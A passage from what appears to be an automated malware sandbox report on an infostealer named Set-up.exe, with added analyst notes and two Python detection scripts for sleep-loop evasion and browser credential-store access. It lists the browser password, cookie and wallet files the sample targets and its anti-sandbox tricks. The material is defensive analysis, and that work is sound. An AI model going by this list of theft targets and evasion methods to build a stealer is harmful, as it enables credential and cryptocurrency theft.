Source: C:\Users\user\Desktop\Set-up.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
Source: C:\Users\user\Desktop\Set-up.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Set-up.exe, 00000000.00000002.2666887733.00000000019A1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: 123.exe
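
The evasion figures above fit together: thread 1308 of service123.exe made 813 Sleep calls, and the 81300 reported against the 30000 threshold is 813 x 100, a loop of 100 ms sleeps totalling about 81 seconds (the report prints the unit as "s", but the arithmetic only works in milliseconds). The registry reads are hardware fingerprinting: {4d36e968-e325-11ce-bfc1-08002be10318} is the display-adapter device class, so DriverDesc names the GPU (a virtual adapter gives the sandbox away), and CentralProcessor\0 exposes the CPU vendor and model string. The following is an added example, not from the report or the sandbox, that replays a constructed API trace through the same kind of per-thread accounting and flags the three patterns recorded above: a Sleep gated by a CreateMutex check, a sleep loop or long sleep, and a fingerprint registry read. The thresholds are the ones the report shows (count > 30, cumulative >= 30000 ms); the 4-call mutex window, the mutex name and the trace itself are assumptions.

```python
from collections import defaultdict
from dataclasses import dataclass

SLEEP_COUNT_MAX = 30        # report: "Thread sleep count: 813 > 30"
SLEEP_TOTAL_MS_MAX = 30000  # report: "Thread sleep time: -81300 >= -30000", read as ms
MUTEX_WINDOW = 4            # assumed: Sleep within 4 calls of CreateMutex on one thread

# Registry locations the sample queried (per the report), lower-cased for matching.
FINGERPRINT_KEYS = (
    "\\control\\class\\{4d36e968-e325-11ce-bfc1-08002be10318}",  # display adapters
    "\\hardware\\description\\system\\centralprocessor",          # CPU identification
)


@dataclass
class Call:
    tid: int
    api: str
    args: tuple = ()


def build_trace():
    """Constructed trace, not sandbox output: a mutex check feeding a Sleep, one
    fingerprint registry read, one long Sleep, and a thread that spins on
    813 x Sleep(100) the way the report's thread 1308 did."""
    trace = [
        Call(5440, "CreateMutexA", (None, False, "constructed_mutex_name")),
        Call(5440, "GetLastError", ()),
        Call(5440, "Sleep", (100,)),
        Call(5988, "RegQueryValueExA",
             ("HKLM\\SYSTEM\\ControlSet001\\Control\\Class\\"
              "{4d36e968-e325-11ce-bfc1-08002be10318}\\0000", "DriverDesc")),
        Call(5988, "Sleep", (60000,)),
    ]
    trace += [Call(1308, "Sleep", (100,)) for _ in range(813)]
    return trace


def analyse(trace):
    """Return ({tid: [sleep_count, sleep_total_ms]}, [finding strings])."""
    sleeps = defaultdict(lambda: [0, 0])
    recent = defaultdict(list)   # per-thread sliding window of API names
    findings = []
    for c in trace:
        window = recent[c.tid]
        window.append(c.api)
        del window[:-MUTEX_WINDOW]
        if c.api == "Sleep":
            sleeps[c.tid][0] += 1
            sleeps[c.tid][1] += c.args[0]
            if any(a.startswith("CreateMutex") for a in window[:-1]):
                findings.append(f"tid {c.tid}: Sleep gated by a mutex check (evasive chain)")
        elif c.api.startswith("RegQueryValueEx"):
            key = c.args[0].lower()
            if any(k in key for k in FINGERPRINT_KEYS):
                findings.append(f"tid {c.tid}: hardware fingerprint read {c.args[0]} -> {c.args[1]}")
    for tid, (count, total) in sleeps.items():
        if count > SLEEP_COUNT_MAX:
            findings.append(f"tid {tid}: {count} Sleep calls > {SLEEP_COUNT_MAX} (delay loop)")
        if total >= SLEEP_TOTAL_MS_MAX:
            findings.append(f"tid {tid}: {total} ms asleep >= {SLEEP_TOTAL_MS_MAX} (stalling)")
    return dict(sleeps), findings


if __name__ == "__main__":
    stats, found = analyse(build_trace())
    for tid, (count, total) in stats.items():
        print(f"tid {tid}: {count} sleeps, {total} ms")
    for f in found:
        print("[!]", f)
```

When reproducing this outside a sandbox, the countermeasure is the one the sandbox already applies: hook Sleep and return immediately (or skew the clock) so the 81 s stall costs nothing, and let a suspicious-looking DriverDesc or CPU string stay in place only if you want to see the sample's bail-out path rather than its payload.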

Stealing of Sensitive Information

Source: Yara match File source: 5.2.service123.exe.6c340000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000003.2649593570.000000000451B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: service123.exe PID: 5440, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR
Source: Set-up.exe String found in binary or memory: \Electrum-btcp\wallets
Source: Set-up.exe String found in binary or memory: \ElectronCash\wallets
Source: Set-up.exe, 00000000.00000000.2043681328.00000000017D7000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: OlkOxygen - Atomic Crypto WalletYoroiPolkadot{.js} extensionSolflare WalletSui WalletBitwarden - Free Password ManagerLastPass - Free Password ManagerEnkrypt - Multichain Crypto WalletRabby WalletAuthyCrypto.com - Wallet ExtensionZilPayExodus Web3 WalletTrust WalletMartian Aptos & Sui Wallet ExtensionOKX WalletAuthenticatorBackpackXverse WalletUniSat WalletTonkeeper - wallet for TONSafePal Extension WalletKeplrTemple - Tezos WalletMEW CXJaxx LibertyGuarda WalletSollet WalletTrezor Password ManagerUnknown Wallet\Ledger Live\Exodus\backupExodus backup\MultiBitHDMultiBit HD\Electrum\wallets\ElectronCash\walletsElectron Cash\Electrum-btcp\walletsElectrum BTCP\walletsUnknown Wallet (Folder - wallets)RAM: Data (Time): CPU: Installed Apps:
Source: Set-up.exe String found in binary or memory: Jaxx Liberty
Source: Set-up.exe String found in binary or memory: \Exodus\backup
Source: Set-up.exe String found in binary or memory: Exodus Web3 Wallet
Source: Set-up.exe String found in binary or memory: Ethereum (UTC)
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
Source: C:\Users\user\Desktop\Set-up.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: Yara match File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR
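
The seven file opens listed above are the standard stealer sweep: Chrome's and Edge's Login Data, Web Data and Cookies, and Firefox's cookies.sqlite and key4.db. Two caveats for the reader. Chrome and Edge encrypt the secrets inside Login Data and Cookies with a key kept DPAPI-wrapped in the profile's Local State file, and Firefox's key4.db holds the key material protecting logins.json; neither Local State nor logins.json is listed here, so these lines show collection, not that the passwords were decrypted in the sandbox. The following is an added example, not part of the report, of a hunt over file-open telemetry: any process other than the owning browser that opens one of these stores is flagged, and a process that touches more than one browser's profile in the same run is reported as a sweep. The events are constructed from the paths above plus a benign chrome.exe read and an unrelated desktop.ini open; the allowlist parameter (for backup or migration tools) is an assumption.

```python
from collections import defaultdict
from dataclasses import dataclass

# Profile-directory fragments -> the one process that legitimately opens them.
BROWSER_OWNER = {
    "\\google\\chrome\\user data\\": "chrome.exe",
    "\\microsoft\\edge\\user data\\": "msedge.exe",
    "\\mozilla\\firefox\\profiles\\": "firefox.exe",
}

# Store file name (lower-cased) -> what a stealer gets from it.
SENSITIVE_FILES = {
    "login data": "saved passwords (AES-encrypted; key sits in Local State)",
    "local state": "DPAPI-wrapped key for Login Data and Cookies",
    "cookies": "session cookies",
    "web data": "autofill and payment data",
    "cookies.sqlite": "Firefox session cookies",
    "key4.db": "Firefox key database protecting logins.json",
    "logins.json": "Firefox saved passwords",
}


@dataclass(frozen=True)
class FileOpen:
    pid: int
    image: str   # full path of the process that opened the file
    path: str    # file opened


def classify(path):
    """(owner browser, store name) if path is a known credential store, else None."""
    p = path.lower()
    name = p.rsplit("\\", 1)[-1]
    if name not in SENSITIVE_FILES:
        return None
    for fragment, owner in BROWSER_OWNER.items():
        if fragment in p:
            return owner, name
    return None


def hunt(events, allow=frozenset()):
    """Credential-store opens by a process other than the owning browser, and
    the (pid, image) pairs that swept more than one browser's profile."""
    touched = defaultdict(set)
    hits = []
    for ev in events:
        c = classify(ev.path)
        if c is None:
            continue
        owner, name = c
        image = ev.image.lower().rsplit("\\", 1)[-1]
        if image == owner or image in allow:
            continue
        touched[(ev.pid, image)].add(owner)
        hits.append((ev.pid, image, owner, name, SENSITIVE_FILES[name]))
    sweeps = [(pid, img, sorted(b)) for (pid, img), b in touched.items() if len(b) >= 2]
    return hits, sweeps


# Constructed telemetry: the paths the report shows Set-up.exe opening, the
# browser reading its own store, and a desktop.ini open that is noise.
U = "C:\\Users\\user"
SETUP = U + "\\Desktop\\Set-up.exe"
CHROME = U + "\\AppData\\Local\\Google\\Chrome\\User Data\\Default"
EDGE = U + "\\AppData\\Local\\Microsoft\\Edge\\User Data\\Default"
FIREFOX = U + "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\v6zchhhv.default-release"
EVENTS = [
    FileOpen(4816, SETUP, FIREFOX + "\\cookies.sqlite"),
    FileOpen(4816, SETUP, CHROME + "\\Network\\Cookies"),
    FileOpen(4816, SETUP, CHROME + "\\Web Data"),
    FileOpen(4816, SETUP, CHROME + "\\Login Data"),
    FileOpen(4816, SETUP, EDGE + "\\Login Data"),
    FileOpen(4816, SETUP, FIREFOX + "\\key4.db"),
    FileOpen(4816, SETUP, EDGE + "\\Network\\Cookies"),
    FileOpen(4816, SETUP, U + "\\Documents\\desktop.ini"),
    FileOpen(7112, "C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe",
             CHROME + "\\Login Data"),
]


if __name__ == "__main__":
    hits, sweeps = hunt(EVENTS)
    for pid, image, owner, name, what in hits:
        print(f"[!] pid {pid} {image} opened {owner}'s '{name}': {what}")
    for pid, image, browsers in sweeps:
        print(f"[!] pid {pid} {image} swept {', '.join(browsers)}")
```

In EDR data the same rule is usually cheaper as a single query keyed on the file name set, with the process allowlist tuned per estate; the multi-browser sweep within one process is the low-noise signal, since legitimate tools rarely read Chrome, Edge and Firefox stores in the same session.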

Remote Access Functionality

Source: Yara match File source: Process Memory Space: Set-up.exe PID: 4816, type: MEMORYSTR